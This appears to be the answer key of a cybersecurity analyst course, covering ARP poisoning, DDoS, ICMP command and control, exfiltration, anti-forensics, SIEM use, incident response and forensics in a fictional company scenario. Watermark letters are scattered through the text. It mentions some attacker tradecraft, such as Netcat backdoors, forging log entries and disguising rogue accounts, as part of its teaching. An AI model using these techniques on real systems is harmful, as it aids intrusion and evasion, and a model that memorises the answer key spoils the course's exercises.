A: Answers will vary. Though it is a bit dated, this is one method of ensuring your tool can detect
malware even when it is cloaked (for example, by being inside a ZIP file). You would usually not want to
at
infect your production systems with live malware, so this operates as a substitute.
lic
ACTIVITY 4-4: Assessing the Impact of Hijacking and

up
5. What is the value to an attacker in doing this?

D
A: The attacker could use the corrupted ARP caches to set up a man-in-the-middle attack where they
capture traffic between each of the workstations and the router (and maybe alter that traffic, if it is
unencrypted). They could also use this attack to create a DoS condition.
ot

A: Answers will vary, as there are several mitigation techniques available. A concrete but difficult to
N
manage technique is to write the ARP tables manually and keep them static. For example, you can add
only workstations that use a particular file server to the table. Subnetting can also reduce the
effectiveness of ARP poisoning, as such an attack won't be routed to different subnets. An IDS can also
o
alert security personnel to suspicious ARP traffic, if configured properly. Port security, DHCP snooping,
and dynamic ARP inspection can work together to effectively identify and block invalid MAC address
D
entries.
Solutions
ACTIVITY 4-5: Assessing the Impact of DDoS

Incidents
2. Is there any pattern to the attacking IP addresses?

A: No, they seem to be completely random, though there are some with numbers close
together.
e
3. What port number are the attackers targeting?
ut
A: Port 80 (HTTP), to take down a web server.
Why do you think some sites go down less than others?
ib
6.
A: Answers may vary, but larger Internet companies like Google and Amazon have
massive Internet connection bandwidth and lots of redundancy so they can absorb a
tr
DDoS attack and still stay online. Others either cannot afford to or do not choose to
spend the money to do that.
is
7. How can you defend an organization against DDoS attacks?
D
A: Answers may vary, but it is very difficult without simply buying lots of extra bandwidth
and/or redundant Internet connections. You may be able to consult with your ISP if it
offers some sort of DDoS protection services. You can also attempt to delay, but not fully
or
stop, an attack by incorporating network perimeter defenses like timing out half-open
connections and lowering the thresholds at which to drop certain traffic like ICMP.
Ultimately, it's important to have a plan in place in case you need to escalate your
mitigation efforts to a specialist or other third party.
e
at
ACTIVITY 4-6: Assessing the Impact of Threats to

Mobile Devices
lic
2. Which platform has more known weaknesses?

up
A: Answers may vary depending on when you check these reports, but when this course
was written, Android had more than twice as many vulnerabilities as iOS. However, iOS
vulnerabilities were more likely to be in the critical score range (9–10). The weighted
D
average CVSS score for iPhone vulnerabilities was also higher than Android. In past
years, the report showed the opposite of these conclusions, which demonstrates that
mobile vulnerabilities fluctuate over time.
ot
4. Why does the Google Play store have so many security apps?
A: Because it is an open platform, many vendors can sell their apps there. Android's
N
openness may also be more attractive to attackers.

o
D
Solutions
6. What are your recommendations for handling BYOD in Develetech?

A: Answers will vary widely, and may reflect an individual's preconceptions. Android has a wide variety
of security apps designed by trusted vendors, but it tends to be a more widely targeted system. Apple
devices may have fewer vulnerabilities, but what vulnerabilities they do have may be more critical. In
today's world, it's not always feasible to impose hard restrictions on the types of devices that personnel
can use, depending on the industry and corporate culture. So, in many cases, the best approach is to
accept the risk or try to mitigate the risk using indirect methods like training personnel on acceptable
device usage, implementing a robust access control and privilege management program across the
organization, and so on.
e
ut
ACTIVITY 4-7: Assessing the Impact of Threats to Cloud
Infrastructures
ib
tr
1. By migrating from on-premises infrastructure to cloud services, what new
security risks or challenges might Develetech be exposed to?
is
A: Examples include: hijacking of the entire cloud account or service (for example, an attacker cracks
the password for the management console); insecure public APIs through which an attacker can gain
D
access to the company's private resources; a malicious insider at the cloud services firm looking to
harm the company or the cloud services firm; as well as the general risks associated with moving to any
web-based service (DoS, password cracking, man-in-the-middle, etc.). One of the fundamental
principles of most cloud services is leveraging economies of scale by sharing a huge pool of storage
or
and computing resources among many customers. Although there are many benefits to this approach, it
also brings a potential weakness. Any vulnerability in the cloud service that enables a malicious
customer of the cloud service to escape their own sandbox may enable them to access information
resources that belong to other companies. While the likelihood of this risk might be low, its impact can
e
be quite high, including the loss of valuable or sensitive data, service interruption for clients and the
cloud provider, possible loss of reputation, legal and civil penalties, and compliance violations.
at
2. What new challenges might Develetech experience in regard to performing

lic
forensics?
A: With local infrastructure, forensic investigations can often be accomplished at the physical level with
an analysis of content in specific storage media. With the cloud, forensics becomes much more complex
up
due to the virtual nature of storage and computing resources. For example, some cloud vendors may
distribute a single user's storage across multiple drives, multiple data centers, or even multiple
geographic regions. Establishing a chain of custody becomes difficult or impossible. As it considers
each cloud service it might adopt, Develetech should model various forensic scenarios to determine if it
D
will be possible to obtain evidence it needs when it needs it. In some cases, it may be necessary to
build forensic capabilities into the design when customizing cloud services or integrating them into your
own infrastructure.
ot
3. In what ways can attackers use cloud services as a hacking tool?

A: The benefits of cloud services apply to attackers as well as legitimate users. For example, attackers
N
can use the big data and scalable computing tools provided by cloud services to perform resource-
intensive operations such as password cracking or DDoS attacks. Hosting services can be used as
collection points for data collected by attackers or as distribution points for malware.
o
D
Solutions
ACTIVITY 5-1: Assessing Command and Control

Techniques
5. Why might this traffic bypass firewall and intrusion detection

system/intrusion prevention system (IDS/IPS) controls?
A: Since many networks do not block outbound ICMP traffic, this type of C&C
e
communication may successfully bypass such controls.
ut
6. How might you stop this type of communication?
A: Answers will vary. Blocking outbound ICMP traffic is an option, but it limits your ability
ib
to diagnose network problems through ping and traceroute. Stateful filtering of this
traffic will not be useful, as there is no state to filter. Application-layer firewalls also tend to
ignore ICMP. However, packet inspectors may be able to review ICMP traffic for unusual
tr
behavior, such as the messages' length or contents. The fact that Windows Security
identified the bot executable as malicious is promising, but it won't necessarily detect
every possible payload.
is
7. What other methods of command and control could an attacker use
D
to evade your security?
A: Answers may vary, but should at least include mention of HTTP/S and DNS. These are
or
very difficult to detect and stop because they blend into normal traffic.
ACTIVITY 5-2: Assessing Persistence Techniques

e
at
1. Why might this approach not be 100% effective?

lic
A: Answers may vary, but rootkits infect a device at its lowest levels, including being able
to alter the fundamental behavior of the operating system itself. Therefore you cannot
always trust an anti-malware scan that's running on the operating system to accurately
detect a rootkit.
up
2. From an attacker's perspective, what advantages does using a

rogue account for persistent access have over using backdoors?
D
A: Answers may vary, but rogue accounts, unlike backdoors, do not require malicious
software to be installed on the target device. There just needs to be an account
configured on the device that has the desired level of access. This helps the attacker
ot
evade both manual and automatic anti-malware sweeps.
3. What does the threat profile of a successful APT usually look like?
N
A: Answers may vary, but APTs are usually launched by multiple experienced
cybercriminals, state-sponsored hackers, or other skilled attackers because of the
o
difficulty in remaining stealthy for long periods of time. There are many potential motives
behind APTs, including a desire for money and association with a larger group. Likewise,
D
the intent of an APT can vary, though it often centers on theft, espionage, or denial of
service.
Solutions
ACTIVITY 5-4: Assessing Data Exfiltration
4. What is the flag to download a directory recursively?

A: -r
6. How could an administrator prevent this exfiltration?
e
A: Answers may vary, but they could disable SSH access on the server, block remote access ports on
the firewall, or implement an IDS/IPS or data loss prevention (DLP) software to monitor sensitive file
ut
movement.
7. What other methods could an attacker use to remove data from the
ib
organization?
A: Answers may vary, but could include: physically connecting removable media to the server;
tr
exfiltrating over FTP/S; exfiltrating over HTTP/S, using Netcat as a backdoor to read and write files over
the network; and more.
is
D
ACTIVITY 5-5: Assessing Anti-Forensics Techniques
5. What other methods could an attacker use to cover their tracks?

or
A: Answers may vary, but they could delete individual entries of an event log rather than the entire log.
This may arouse less suspicion, but will typically take more time and finesse to identify each and every
e
relevant entry. The attacker may also forge log entries rather than delete any of them to misdirect a
forensic analyst.
at
lic
ACTIVITY 6-1: Conducting a Cybersecurity Audit

up
6. What are some of the audit failures you encountered?

A: The server should have failed the following audit questions: 1.1, 1.2, 1.3, 2.1, 3.4, and 3.5. Most of
the failures center on the domain password policy and the server's physical security, with one failure in
D
the local security policy.
7. How might you communicate these audit results to a manager or other

ot
decision maker?
A: Answers may vary, but you can tell your audience the server is failing to meet the password
requirements set out by company policy, and that these issues should be corrected in the domain policy
N
and then pushed out across the domain. You can also suggest that Microsoft accounts be explicitly
prevented from logging on to the server to correct the one local security policy failure. From a physical
security standpoint, although being able to move the server around is more convenient, the
o
administrators should securely fasten the server to the shelf or some other surface to prevent it from
being carried out. If they need to make room for new equipment, they should better plan where to place
D
existing equipment and the new equipment. Lastly, you should suggest that the company install
automatic lights so the lights turn on when administrators enter the room and turn off when they exit.
That way, passersby can't see into the room when no one's around.
Solutions
ACTIVITY 6-2: Implementing a Vulnerability

Management Plan
3. According to these requirements, what are some of the behaviors

that Develetech must incorporate into its vulnerability management
program?
e
A: Answers may vary, as there are several requirements that PCI DSS outlines for the
organization. Some examples include: the organization must scan for all wireless access
ut
points (WAPs) in its environments at least once every three months; the organization
must run a vulnerability scan after a significant change to its network (e.g., its topology
changes); the organization must allow an external vulnerability assessment agency
ib
validated by PCI DSS to scan environments every three months; the organization must
have a monitoring process in place for detecting changes to critical files; and more.
tr
4. How could the nature of this cloud platform business inhibit
Develetech from remediating this problem?
is
A: Answers may vary, but Develetech needs to consider the impact of putting the security
patch in place. If the company simply propagates the fix to all production environments at
D
once, there will likely be processing and networking bottlenecks that cause delays or may
even lead to a disruption of service. If this is in direct violation of the SLA, Develetech
may be subject to legal action. The vulnerability management plan needs to account for
5.
or
the impacts of remediation with regard to the company's various business arrangements.
What factors influence your decision to conduct these two scans at

different frequencies?
e
A: Answers may vary. The comprehensive vulnerability scan is likely to be a bigger drain
at
on network and computing resources, so it wouldn't necessarily be feasible to conduct

this scan every day. On the other hand, the port scan is less disruptive, so it makes more
sense to conduct it more frequently. Time is also a factor—the comprehensive scan could
lic
take several hours, or even days, while the port scan may take just a few minutes.
Another factor to consider is employee workflow. Starting the comprehensive scan in the
middle of a weekday is not the best choice, as the chance of interrupting business is at its
up
highest. Performing either scan after business hours or on the weekend is usually the
best approach.
D
ACTIVITY 6-3: Conducting Vulnerability Scans

ot
6. When you fix the major vulnerabilities in a system, how can you
ensure they are repaired?
N
A: You can rerun the GSA scan and see if the vulnerabilities persist.
o
7. Why would you not always be able to fix a vulnerability that GSA
marks as critical?
D
A: Answers may vary, but some vulnerabilities require software patching to fix them, and
the organization may not be able to update certain software. Some services may also be
marked as critical vulnerabilities by GSA, but must be enabled on the host for a variety of
reasons.
Solutions
8. What kind of vulnerability is GSA unable to find?

A: Answers may vary, but GSA cannot discover policy or social engineering vulnerabilities.
9. How can a vulnerability scan like this be useful to a penetration test?

A: Answers may vary, but being able to identify general weak points in an organization can help a
penetration tester focus their efforts on systems most likely to be insecure. The penetration tester can
actively exploit the vulnerabilities identified by GSA, demonstrating the impact of an attack if it is not
prevented.
e
ut
ACTIVITY 6-4: Conducting Penetration Testing on Network
Assets
ib
tr
7. How would you defend against this attack?
A: Answers will vary, but might include: use an intrusion detection system (IDS)/intrusion prevention
is
system (IPS), use two-factor authentication for administrator accounts, limit the number of administrator
accounts, and ensure strong passwords.
D
8. What other tools would work well with the Metasploit Framework in a
penetration testing environment?
or
A: Answers might include vulnerability scanners such as Nessus, Rapid7, and so on; password crackers
like John the Ripper, Cain & Abel, Ncrack, and L0phtCrack; and Nmap and other port scanners.
e
ACTIVITY 7-1: Deploying a Security Intelligence Collection and
at
Analysis Platform
lic
1. What are the advantages of CSM that could convince management to offer
their financial backing?
up
A: Answers may vary, but with CSM, the organization is able to constantly survey all of its assets for any
behavior that induces risk. Data collected on this behavior is both up to date and actionable; problems
are detected immediately, and can likewise be contained as quickly as possible to minimize damage.
D
These CSM systems can also be configured and customized to suit the organization's needs, even as
business operations or the threat landscape change. Ultimately, a CSM can drastically reduce the risk
of an attack going unidentified for a long period of time due to stagnant collection processes.
ot
2. What steps would you take to determine which sources to choose for data
collection?
N
A: Answers may vary, but the organization should first identify the major risks it faces. The risk
assessment team then needs to prioritize those risks by measuring the most likely risks against the risks
that will cause the most damage. This will enable the intelligence collection team to focus on data that is
o
most relevant to mitigating those risks. The collection team will review these relevant data sources for
components like alerts, logs, captures, etc., that can provide insight into the risk. Lastly, the collection
D
team will narrow their focus to the most actionable data, and attempt to eliminate redundant data or
data that does not provide optimal value.
Solutions
3. When it comes to processing disparate types of data, what

challenges will the collection and analysis platform face?
A: Answers may vary. Log files come in many different formats based on different
standards—or sometimes, no standards at all. Log files can be generated in CSV format,
syslog format, XML, and much more. Some formats are open source and easy to work
with, whereas some are proprietary and require specific software. Logs may also be
encoded using different schemes, such as ANSI versus Unicode. The time-keeping
element of an appliance may not be synchronized with other appliances, making it difficult
to correlate data based on a time factor.
e
ut
ACTIVITY 7-2: Collecting Network-Based Security
Intelligence
ib
tr
3. How many TCP packets did Snort examine?
A: Answers will vary, but the number will be large, typically in the thousands.
is
4. Why do you think there were only five instances of each alert in the
D
traffic?
A: The limits placed in the rules file show only the first five instances of each alert within a
5.
30-minute period.
Why limit the number of alerts?

or
A: To not overwhelm your IDS with traffic and fill your logs with just a few loud attacks like
e
this one.
at
6. When might you want to temporarily see every instance of an

alert?
lic
A: For analysis purposes once you know an attack is coming.
8. Were all of the XMAS scans identical? If not, how were they
up
different?
A: No, some have just FIN, PSH, and URG, while the others include the SYN flag. Three
of them are marked by Wireshark as retransmissions.
D
10.How is the output in the command prompt different?

ot
A: There are many more alerts. So many that it constantly scrolls.
12.Is the number of TCP packets (or other statistics) significantly

N
different from the previous scan?

A: No, the numbers are about the same. Snort just alerted on more of the malicious traffic
than before.
o
D
13.Why is it important to carefully tune and limit your IDS rules in a

production environment?
A: To limit the number of alerts that are logged for the same attack and make sure that
actual attacks do not get lost in false positives. Storage space can also be a concern if a
great deal of data is logged over a period of time.
Solutions
ACTIVITY 7-3: Collecting Host-Based Security Intelligence
4. Looking at the remote logon event list, can you tell what caused these
events?
A: Several of these remote logon events were created when you remotely accessed the server using
the Metasploit PsExec exploit during the penetration test activity.
e
5. What is the value of this tool beyond using Event Viewer alone?
ut
A: Answers will vary. Log Parser can combine multiple logs, even from different devices. It also
automates many of the queries you would otherwise have to do by hand.
ib
ACTIVITY 8-1: Analyzing Linux Logs for Security Intelligence
tr
is
3. How would you use grep to look for a negative match for a pattern rather than
a positive match?
D
A: The -v flag does a negative match.
What other useful delimiters are there?

5.
7.
or
A: Answers will vary, but major delimiters include space, tab, period, and comma.
How would you identify warnings in this log?

e
A: Answers may vary, but it would be something like sudo grep -i "warning" syslog.1 |
at
cut -d ":" -f1-3

lic
ACTIVITY 8-2: Incorporating SIEMs into Security Intelligence

Analysis
up
4. Is there any evidence of the SSH password attack you ran in the "Analyzing
D
Attacks on Computing and Network Environments" lesson?

A: Yes, Splunk should show many password failures (hundreds) depending on what experimentation
you may have done.
ot
5. Despite the fact that you covered your tracks in the "Analyzing Post-Attack
N
Techniques" lesson, why do log entries concerning SSH still appear?

A: There are two reasons. The most obvious is that you used SSH after you cleared the Application log,
so any of that activity would be logged. However, there are still SSH logs from the cracking attempt in
o
the "Analyzing Attacks on Computing and Network Environments" lesson, as mentioned in the previous
question. This is because some SSH activity is also sent to the Security log, which you likely didn't
D
clear. Remember, you performed online dictionary cracking using Ncrack; it tried and failed to connect
using many different passwords before it successfully connected with the correct password.
6. How would you look specifically for SSH password failures for the
Administrator account that came from Kali Linux?
A: Answers may vary, but using the search query sshd pass* fail* admin* 10.39.5.# where # is the last
octet of your Kali Linux IP address will work.
Solutions
8. What other sources of data would you load into Splunk in the
Develetech network?
A: Answers will vary, but should include firewall logs, intrusion detection system (IDS)
logs, web server logs, and logs from other critical systems.
9. How does a system like this aid security management?

A: Answers will vary, but could include: it pulls all logs into one place for analysis and
enables the massaging of data and reconstruction of events for incidents.
e
ut
ACTIVITY 9-1: Analyzing Incidents with Windows-
Based Tools
ib
tr
2. How would you renew a Dynamic Host Configuration Protocol
(DHCP) lease on your Ethernet adapter?
is
A: ipconfig /renew Ethernet
D
4. What is the default gateway for your Ethernet adapter?
A: 10.39.5.1
5.
or
What is the DNS address for your Ethernet adapter?
A: 10.39.5.#, where # is the student's Windows Server IP address.
e
8. What do the -a and -b flags do in netstat?
at
A: The -a flag shows all connections and listening ports, and the -b flag shows the
executables associated with each connection.
lic
10.What does the status show for that connection?

A: ESTABLISHED
up
16.How could these tools help you discover and deal with malware?
A: Answers will vary. The netstat command can enable you to find any open or recently
closed network connections that are either malicious or being used in an insecure way.
D
Process Explorer enables you to find suspicious processes and see how they interface
with system DLLs and the Windows Registry. Registry Editor enables you to further
identify a suspicious program's configuration details, including any changes to the less
ot
visible components of the operating system. With any tool, you need a good working
knowledge of Windows' normal operation to make educated decisions about what is and
is not malware.
N
o
ACTIVITY 9-2: Analyzing Incidents with Linux-Based

Tools
D
2. How would you change the maximum transmission unit (MTU) for
the eth0 interface to 512?
A: sudo ip link set eth0 mtu 512
Solutions
3. How might you use the ip command to analyze a potential attack?

A: Answers may vary. If any of the interfaces on a host are not configured properly when compared to
their baseline, this could indicate a compromise. Settings like the IP address, MTU, and MAC address
could be altered by an attacker to intercept communications or turn the host into a botnet zombie under
some remote server's control. Abnormal packet transmission totals or excessive packet loss errors
could indicate likewise.
6. How might you use the top command to detect malicious activity?
A: Answers may vary, but one of the most common ways to detect malicious activity is by watching the
e
memory and CPU usage of processes running on the system. You may be able to spot suspicious
processes that are taking up too many resources.
ut
10.What other Linux tools and commands could you use to search the capture if
ib
you didn't have access to Wireshark?
A: Answers may vary, but using grep to search the capture for specific addresses, protocols, or other
tr
details, and cut to trim the output, would be useful.
is
ACTIVITY 9-3: Analyzing Indicators of Compromise
D
2. What can you conclude about the account listed in the results?
or
A: It hasn't been used yet, and appears to have been created as a backup or backdoor method for
access to the domain. The DC administrators may be helpful in verifying this account's purpose.
Assuming this account was created or used by an attacker, what could the
e
3.
attacker have done to make it harder to spot as malicious?
at
A: The attacker could have given it a name more relevant to the company, especially if the company
has specific account naming conventions. Limiting the account's privileges may also make it less likely
lic
to be monitored or audited.
9. What remote changes did Windows detect to the DT_Watch directory?

up
A: Windows logged everything associated with accessing the directory, even the directory listing
commands.
10.Why is this level of auditing impractical for commonly used folders?

D
A: Answers may vary, but the volume of logs would be incredibly difficult, if not impossible, to manage.
ot
11.What type of security solution would be better at detecting unauthorized

changes in files and configurations?
N
A: Answers may vary, but a host-based intrusion detection system/host-based intrusion prevention
system (HIDS/HIPS) or file integrity monitors (FIMs) are suited to this kind of security control.
12.What other IOCs might you have left behind?

o
A: Answers will vary, but could include: excessive login failures, unexplainable gaps in logs, unusual
D
levels of ICMP traffic or other networking protocols, unusually high access rates to the Administrator
account, and so on.
Solutions
ACTIVITY 10-1: Developing an Incident Response

System
2. What members of the organization will help you deal with the
current incident? Which others would you routinely include in the
CSIRT?
e
A: Answers will vary, but management, IT, human resources, and physical security might
routinely be included here.
ut
4. Which of these questions can you answer now?
ib
A: Answers will vary, but might include basics of the event, timestamps, some locations
(internal at least), and the fact the incident is unsolved.
tr
5. What additional questions would you ask about the incident based
on what you know so far?
is
A: Answers will vary, but they might include: Who is in the office today? What files were
taken? Is there any evidence of proprietary information being posted publicly?
D
1.
or
ACTIVITY 10-2: Identifying and Analyzing an Incident
What else should you and your team collect that will help you
e
understand what happened?
at
A: Answers will vary. The team will need to collect any network logs that list remote
access events. The team discovered the remote IP address (67.240.182.117), but any
additional information, like the number of connection attempts, or any past activity by this
lic
IP address, will be valuable. On a network level, the team should also identify any
intrusion detection/prevention activity that generates alerts. If the affected server has any
anti-malware or HIDS/HIPS running, the team should also consider any alerts from these
up
as incident-related data. The team can also consult its SIEM solution to see if any
anomalous activity was detected in its log analysis duties. At this point, the team doesn't
know what, if anything, was done to the server or network. All of these tool-assisted
records can help them piece together the extent of the damage. Beyond technical
D
sources of data, others in the team should also start interviewing all relevant employees.
Charles needs to describe every step that he took when he tried signing in to his account,
as well as who he contacted to get that resolved, and when. The help desk employee
ot
needs to corroborate this information. Likewise, you should confiscate Pat's workstation.
It may be helpful to try contacting Pat as well and explaining the situation. Any
surveillance camera footage around the time of Pat's computer accessing the server
should also be gathered. What's more, you should determine if anyone else was in the
N
building before 8:00 a.m. and witnessed any unusual behavior, especially around Pat's
desk.
o
2. What, if anything, does this tell you about a potential incident?

D
A: Unfortunately, not much. A fact of incident analysis is that not every indicator or source
of information will be relevant or even accurate. This could indicate that someone
specifically used this IP address because they knew it had no history that could be traced
back to them; or, it might simply mean that it was the user's first time ever accessing a
remote computer in the domain from that IP address.
Solutions
3. What does this suggest happened?

A: It suggests, but does not prove, that the user was simply guessing the password to Charles' account.
After too many failed guesses, security measures kicked in and locked the account. Because Charles
denies he tried to log in last night, it seems unlikely that Charles himself forgot his password or mistyped
it over and over again. Thus, the team can reasonably conclude that someone attempted to use
Charles' account as a way to log in to the research and development server remotely.
4. What does this suggest about the role of Pat's account and workstation in the
incident?
e
A: It suggests the attacker merely found the password Pat wrote down and put in the drawer, and then
ut
used that to log in to the account at Pat's workstation.
5. What practices should the team put in place for this important phase of the
ib
response?
A: Answers will vary. The team should have a baseline already in place for normal behavior on both a
tr
network level and on the affected host. This will make detecting a deviation from the norm much easier.
The team has already done some log correlations, but it also needs to go further and make sure that it
is
knows exactly what happened on the network and the host at specific times. A SIEM solution can assist
the team in doing this, if available. The team can also make their jobs easier by filtering out irrelevant
data they've collected, which often becomes apparent during the analysis phase. Any alerts generated
D
by IDSs at key times may also confirm the nature of a possible attack, especially if any reconnaissance
was done prior to the incident.
6. What might this suggest?

or
A: It could suggest that the person who logged in to Pat's workstation attempted to remove data from
that workstation. It could also suggest that the person loaded something onto the server.
e
7. What does this suggest?
at
A: It suggests that a sensitive document was quickly exfiltrated from the research and development
server and moved to a different host—most likely Pat's workstation—as it was the only account signed
in at the time. The document was then deleted from Pat's workstation.
lic
8. What do you believe has happened?

A: Answers may vary, but essentially, you might say something along these lines: An attacker attempted
up
to use Charles' account to connect remotely to the internal research and development server. The
attacker failed. Later, in the early morning before most people made it in to the office, the attacker
physically went to Pat's desk, discovered the password written down in a drawer, and used it to log in to
the workstation and the remote server. While in the remote server, the attacker transferred sensitive
D
product files to Pat's workstation, where the attacker then copied the file to a removable drive. The
attacker deleted the file from Pat's workstation, ejected the removable drive, and left. The organization's
data has been breached.
ot
N
o
D
Solutions
ACTIVITY 10-3: Containing, Mitigating, and

Recovering from an Incident
1. What are some containment and mitigation strategies you'd

perform on this incident to stop a data breach from continuing or
reoccurring?
e
A: Answers will vary. Some devices, like Pat's workstation and the research and
development server, have been collected for analysis. They should stay disconnected
ut
and isolated from the wider network in case the attacker has a backdoor communication
channel into these devices. When the CSIRT is ready, they should also perform malware
scans on the isolated systems to determine if any filtering needs to be applied to the
ib
wider network. If the attack was assisted by malware, the team needs to block the source
of that malware using whatever method they deem to be appropriate. Both Charles and
Pat should have their domain accounts disabled for now, so the attacker cannot continue
tr
to use them as vectors. Network access to other servers that hold sensitive information
should also be actively monitored or completely denied, depending on how significantly
is
this will impact business needs.
2. What likely cannot be contained by the CSIRT team as a result of
D
this breach?
A: If the attacker was able to exfiltrate data onto a USB drive and leave the building with
or
it, they could have distributed it in any number of ways. If the design document falls into
the hands of a competitor or is uploaded to the public Internet, it will be very difficult, if not
impossible, to fully contain the breach.
e
3. How would you recover the functionality that the research and
development server provided, such as serving documents about
at
upcoming Develetech products, as well as the functionality of Pat's

workstation?
lic
A: Answers will vary. Some may argue that, because the systems are both clean of
malware, and the only point of compromise at the moment is user accounts that have
been disabled, it is safe to push both computers back into production. However, without
up
the full picture of the incident, it would be premature to say there couldn't be other points
of compromise that the team doesn't yet know about. Likewise, both devices may need to
be treated as evidence in an upcoming investigation, so pushing them back out rather
than keeping them quarantined would hurt that investigation. Instead, it would be best to
D
recover the latest backup copy of the research and development server, put that backup
image on a different machine, and use that as the live production environment for now.
The IT department can provision a temporary workstation for Pat while the normal one is
ot
quarantined.
N
o
D
Solutions
4. When it comes to Charles' and Pat's disabled user accounts, how will you
approach recovery?
A: Answers will vary. The team may decide to restore Charles' account immediately, as it appears the
attacker only knew his user name, and not his password. His user name is likely common knowledge in
the company or easily guessable anyway. Therefore, anyone with access to the research and
development server could have been a target without having done anything necessarily wrong. On the
other hand, Pat's account is compromised and it needs a password change before it can be re-enabled.
However, even before that, it would be a good idea to ensure that Pat is trained on proper end-user
security practices, and should be reacquainted with the company-specific policy regarding passwords
e
and password storage. The human factor is one of the weakest points in the security of any
organization, and writing passwords down and putting them in an unlocked drawer is certainly not an
ut
acceptable practice. Until Pat has demonstrated a willingness to comply with security policies and
guidelines, the account should stay disabled.
ib
5. What lessons have you learned from this incident, what suggestions do you
have so that an incident like this is prevented in the future, and what other
tr
content should be in the report?
A: Answers will vary. The AAR should clearly outline what actions the CSIRT took in its incident
is
handling procedures. This includes every step, from identification and analysis, to containment and
eradication, and then to recovery. The report should justify the actions the team took, and, if applicable,
should admit if there were more efficient and accurate ways of handling the incident. Finally, the team
D
needs to ask itself what should change as a result of this incident. The suggestions they put forth can
be: encrypt the research and development server and every other server that holds sensitive data;
disable USB ports on certain at-risk hosts; mandate company-wide training for end users on best
or
security practices; draft policies that mirror this training, especially concerning best usage of passwords
and the storage of those passwords; and, if feasible, implement a DLP solution on the research and
development server so that any attempted exfiltration of data will be denied.
e
at
ACTIVITY 10-4: Handing Over Incident Information to a

Forensic Investigation
lic
1. How do the goals of a forensic investigator differ from that of a first

up
responder?
A: Answers may vary, but the most clear difference is that a first responder is concerned with detecting
an incident and stopping it, thus returning operations to normal; whereas a forensic investigator is
D
focused on evidence, as well as understanding the nature of an incident to pursue punitive actions or
determine that no such action should be taken.
Despite the differences in goals, how do the two disciplines overlap?

ot
2.
A: Answers may vary, but both an incident responder and a forensic investigator will need to be involved
in securing and isolating assets, sharing information about the possible source and vector of an attack,
N
and reconstructing a timeline of events surrounding and including the incident.
3. What are some of the best practices that you can employ when
o
communicating your results to Develetech's forensic team?

D
A: Answers will vary. First, the CSIRT will want to designate a liaison. Although both teams can meet as
a whole, this liaison will be an ongoing point of contact for the forensic team to consult with. This point of
contact should be the authoritative voice of the team, able to bridge both the needs of the CSIRT and
those of the forensic team. The CSIRT should also communicate the scope of the incident: every asset
affected, every employee involved, and so on. This will ensure that the forensic team does not have an
incomplete picture from which to draw evidence. It's also important that the CSIRT describe the
techniques and tools they used to contain and mitigate the incident, as these could end up affecting the
investigation.
Solutions
4. What specifically do you need to give the forensic team so they

have all the information they need to do their work?
A: Answers may vary, but you need to send them all the relevant event and network logs
from that morning and the failed remote connection attempt from the night before; hand
over custody of Pat's workstation and the research and development server, along with a
list of activities the CSIRT performed on these assets; and give them the AAR that details
exactly what you know so far about the incident.
e
ACTIVITY 11-1: Applying a Forensic Investigation Plan
ut
What must you know about Develetech's computing environments
ib
1.
to prepare for a forensic investigation?
tr
A: Answers will vary. You need to know the following about the systems affected by the
incident: the type of hardware in place; the operating systems and other software used on
the computers; any environments that may have been virtualized versus those that are
is
physical; the forensic tools of the trade that can assist you in your duties; any of
Develetech's systems that must stay active during an investigation to support business
needs; and all applicable laws and regulations that could impact your work.
D
2. How can an analysis of these anti-malware logs help your
investigation?
or
A: Answers may vary, but the team might be able to discover identifying information from
the titles of the other files on the USB drive. This could lead them to the culprit or at least
the owner of the USB drive.
e
What are some of the important steps involved in upholding the
at
3.
integrity of your investigation? How can you better convince your
audience of your findings?
lic
A: Answers may vary, but observing the chain of custody is a must for any investigation.
The movement of Pat's workstation and the research and development server should be
documented based on who last worked with each computer and what exactly was done.
up
This process should be ongoing. Furthermore, you need to consider how the evidence
you found so far can be authenticated. You need to demonstrate to your supervisor, and
possibly to law enforcement in the future, that the evidence you gathered has not been
tampered with. One example is by hashing the images of each drive so that an outside
D
party can verify that hash when the evidence makes its way into their custody.
ot
ACTIVITY 11-2: Securely Collecting Electronic

Evidence
N
o
2. Why is it important to take note of the hash value of the drive

image?
D
A: A hash value supports integrity of evidence; when the drive image moves down the
chain of custody, the actual hash can be compared to the expected value. If they match,
the forensic analyst or court official can confirm that the evidence was not tampered with
during this time.
Solutions
3. What kinds of important metadata are usually collected in a drive image such
as this one? How can this metadata shape your investigation?
A: Answers may vary, but metadata can include: directory structure, file locations, file sizes, and the
date a file was created/last modified. This metadata can help a forensic analyst correlate data and come
to understand the bigger picture of an incident.
4. When it comes to keeping this drive image secure, what sort of preservation
techniques would you recommend?
e
A: Answers will vary. Because data is virtual, and must depend on physical hardware, it's a good idea to
replicate this image across more than one physical medium in case one were to fail. The rooms in which
ut
you store these physical media should be locked and climate controlled.
ib
ACTIVITY 11-3: Analyzing Forensic Evidence
tr
6. Focusing on just the non-deleted files, what does this tell you about Rupert's
is
interests? Is there anything incriminating so far?
D
A: Rupert seems to be interested in video games, as the drive includes various files related to them.
That's obviously not incriminating by itself, but it may suggest that he was wasting company time and
resources if he was using this drive at work. More interestingly, the drive includes the
my_contract_invoice3.docx file that the CSIRT identified earlier as being correlated with Pat's breached
8. What is this program? Is it incriminating?

or
workstation. There's also a ZIP file with the somewhat suspicious name of nethack-360-win-x86-2.zip.
e
A: NetHack is an old text-based dungeon crawler video game. Despite its name, it's not useful for
malicious purposes, so there's nothing really incriminating about it. Red herrings like this are always a
at
possibility in forensic work.
10.Just by looking at the list of names, what can you tell about what was deleted
lic
from this USB drive?

A: Several files and one folder were deleted. The folder is called DT_Watch_images, and the files have
up
various names, some of which appear incomplete. It may be possible to guess the contents of some of
the files based on their names and file extensions. For example, dt-w1_product_specs.pdf is likely the
product specification document for Develetech's smartwatch.
D
12.How will using this tool help you in your case against Rupert?
A: It enables a detailed analysis of information from drive images and gives an investigator the ability to
write notes about content and examine evidence without risking contamination of the original evidence.
ot
13.Considering all of your work so far, how confident are you of Rupert's
N
involvement in the incident?

A: Answers will vary. Some will think the evidence is overwhelmingly suggesting that Rupert attempted
to steal sensitive data from the company and then cover his tracks. Others may hold out on committing
o
to a final judgment, and will want to see if there is any more evidence that could make them more
certain.
D
14.Given the nature of the evidence you've analyzed, what would you suggest
Rupert's intentions were?
A: Answers will vary, but assuming his coworkers' testimony is accurate, Rupert was likely intending to
sabotage Develetech, either by giving away its secrets or by selling those secrets to a competitor.
Solutions
ACTIVITY 11-4: Conducting Post-Mortem Activities
1. Based on your findings of the data breach incident, what would you
include in this report?
A: Answers will vary. A useful report includes the following information: who authorized
